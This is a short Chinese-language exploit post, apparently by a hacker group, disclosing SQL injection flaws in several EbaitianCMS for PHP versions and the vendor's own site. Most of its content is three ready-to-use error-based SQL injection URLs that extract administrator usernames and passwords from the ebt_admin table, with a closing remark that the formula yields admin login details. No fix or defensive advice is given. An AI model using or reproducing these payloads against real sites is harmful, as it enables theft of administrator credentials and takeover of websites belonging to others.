EbaitianCMS For PHP V2012多个版本及官网SQL注入漏洞

作者：YoCo Smart 来自：Silic Group Hacker Army 

经测试，此漏洞官网()也有，而且官网的更加严重。。。
测试版本：搜狗电脑知识网
EbaitianCMS For PHP V2011Beta3.2
EbaitianCMS For PHP V2012Beta5.2
EbaitianCMS For PHP V2012CN6.0
EbaitianCMS 官方网站
漏洞文件：
很多。。。举个(栗)子。。。

?bigclassid=9&smallclassid=0+union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+concat(username,0x5f,password)+from+ebt_admin+limit+2,1))a+from+information_schema.tables+group+by+a)b%23

:81/class.jsp?bigclassid=9&smallclassid=0+union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+concat(username,0x5f,password)+from+ebt_admin+limit+0,1))a+from+information_schema.tables+group+by+a)b%23

?id=0+union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+concat(username,0x5f,password)+from+ebt_admin+limit+0,1))a+from+information_schema.tables+group+by+a)b%23

直接错误回显注入套公式得到管理员登陆信息

• 没有相关文章